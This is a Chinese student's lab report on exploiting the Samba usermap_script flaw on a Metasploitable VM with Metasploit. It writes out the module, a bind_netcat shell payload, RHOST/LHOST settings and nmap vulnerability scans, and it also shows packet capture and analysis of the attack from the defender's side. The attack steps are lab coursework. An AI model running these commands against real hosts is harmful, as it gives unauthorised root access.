本周学习了使用metasploit工具进行攻击和使用监听工具分析攻击数据包的技能。
使用Metasploit进行Linux远程渗透攻击。
使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
实践步骤
1.启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一; 2.使用exploit:exploit/multi/samba/usermap_script渗透攻击模块; 3.选择攻击PAYLOAD为远程shell,(正向或反向连接均可); 4.设置渗透攻击参数(RHOST,LHOST,TARGET等); 5.执行渗透攻击; 6.查看是否正确得到远程Shell,并查看获得的权限。
攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
linux渗透实验
本次实验使用的攻击机为Kali,IP地址为192.168.128.137;靶机为Metasploit Ubuntu,IP地址为192.168.128.6
在kali打开metasploit,并使用search samba搜索关键词找到合适的渗透模块。
exploit/multi/samba/usermap_script模块为我们所需要的。
输入命令 use exploit/multi/samba/usermap_script加载渗透模块
使用show payloads显示攻击载荷
使用set payload cmd/unix/bind_netcat设置攻击载荷
设置攻击机IP和靶机IP 命令 set RHOST 192.168.128.6;set LHOST 192.168.128.137,
然后run进行攻击,攻击成功后输入ifconfig命令查看IP地址,输入whoami查看当前权限账户为root
攻防对抗实验
攻击方为kali IP 172.30.2.56 ;防守方为Metasploit Ubuntu IP 172.30.7.239
使用命令 nmap -sV 172.30.7.239 扫描目标主机的开放端口和版本号等信息
使用命令 nmap --script vuln 172.30.7.239 扫描目标主机的漏洞
随后步骤与上文相似
随后捕获了如下数据包。
如下图可以判断攻击IP为 172.30.2.56 端口为139
如下图可只攻击时间大概为2022,5,28 22:37
追踪tcp流可以分析出使用下列漏洞。使用的漏洞为Samba服务 usermap_script安全漏洞
攻击成功后输入了如下命令
echo ifconfig 等
问题1:对攻击的分析方式不明白
问题2:对shellcode不知道如何分析
对于如上问题,查阅了其他博客才有所理解
本次实验我实验了metasploit工具,使用Metasploit进行Linux远程渗透攻击,并进一步熟悉了Metasploit工具的使用。通过攻防对抗实验,动手实验了攻击的包的捕获过程,并通过查阅资料和自己的探索,学会了对攻击的包的分析,掌握了漏洞搜集的基本能力。提高了自己的实践能力。